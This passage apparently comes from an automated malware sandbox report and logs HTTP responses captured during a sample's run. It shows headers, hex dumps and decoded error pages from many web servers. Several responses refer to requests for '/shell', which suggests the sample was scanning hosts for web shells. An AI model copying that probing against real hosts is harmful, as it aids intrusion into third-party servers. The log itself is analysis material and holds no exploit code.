              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 29 Nov 2023 09:28:52 GMTServer: Apache/2.0.55 (Trustix Secure Linux/Linux)Connection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 49 53 4f 2d 38 38 35 39 2d 31 22 3f 3e 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 4e 65 74 67 40 74 65 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 0a 20 20 0a 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 3b 55 52 4c 3d 27 2f 27 22 3e 0a 20 20 20 20 20 20 0a 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 23 46 46 46 46 46 46 3e 0a 0a 0a 0a 3c 53 43 52 49 50 54 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 61 76 61 73 63 72 69 70 74 2f 6d 65 6e 75 5f 61 72 72 61 79 2e 6a 73 22 20 74 79 70 65 3d 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3e 3c 2f 53 43 52 49 50 54 3e 0a 3c 53 43 52 49 50 54 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 61 76 61 73 63 72 69 70 74 2f 6d 6d 65 6e 75 2e 6a 73 22 20 74 79 70 65 3d 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3e 3c 2f 53 43 52 49 50 54 3e 0a 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 31 30 30 25 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 31 35 30 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 5f 74 61 6c 63 2e 6a 70 67 22 3e 3c 2f 74 64 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 2a 3e 3c 2f 74 64 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 31 30 30 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 5f 6e 65 74 67 61 74 65 2e 6a 70 67 22 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 21 2d 2d 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 62 61 72 72 65 66 69 6e 65 2e 6a 70 67 22 3e 3c 2f 64 69 76 2d 2d 3e 0a 0a 0a 0a 20 20 20 20 3c 63 65 6e 74 65 72 3e 3c 70 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 72 65 64 22 3e 43 65 74 74 65 20 70 61 67 65 20 6e 27 65 78 69 73 74 65 20 70 61 73 2e 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 56 6f 75 73 20 73 65 72 65 7a 20 72
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: RomPager/4.07 UPnP/1.0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jan 2024 05:24:59 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 02 Jan 2024 05:24:59 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 02 Jan 2024 05:24:59 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jan 2024 05:25:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jan 2024 05:25:01 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jan 2024 05:25:01 GMTServer: ApacheVary: Accept-EncodingContent-Length: 203Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: awselb/2.0Date: Tue, 02 Jan 2024 05:25:02 GMTContent-Type: text/plain; charset=utf-8Content-Length: 0Connection: keep-alive
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 02 Jan 2024 05:25:04 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 214Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.<br /></p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeContent-Type: text/html; charset=utf-8Content-Length: 337Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 36 22 3e 3c 74 69 74 6c 65 3e 4e 54 4c 33 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 31 30 2e 31 30 2e 33 34 2e 33 36 2f 3f 74 79 70 65 3d 49 6e 76 61 6c 69 64 20 4b 65 79 77 6f 72 64 26 70 6f 6c 69 63 79 3d 4d 61 69 6e 50 6f 6c 69 63 79 20 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 76 73 70 61 63 65 3d 22 30 22 20 68 73 70 61 63 65 3d 22 30 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><title>NTL3</title></head><body><iframe src="http://10.10.34.36/?type=Invalid Keyword&policy=MainPolicy " style="width: 100%; height: 100%" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspace="0"></iframe></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jan 2024 05:25:56 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jan 2024 05:25:11 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Tue, 02 Jan 2024 05:25:12 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 02 Jan 2024 05:25:01 GMTServer: Apache/2.4.12 (Win32) PHP/5.6.5Content-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jan 2024 05:25:18 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jan 2024 05:25:19 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Tue, 02 Jan 2024 05:25:21 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jan 2024 05:25:21 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 02 Jan 2024 05:25:09 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 02 Jan 2024 05:25:24 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 02 Jan 2024 05:25:25 GMTContent-Type: text/htmlContent-Length: 3650Connection: keep-aliveETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 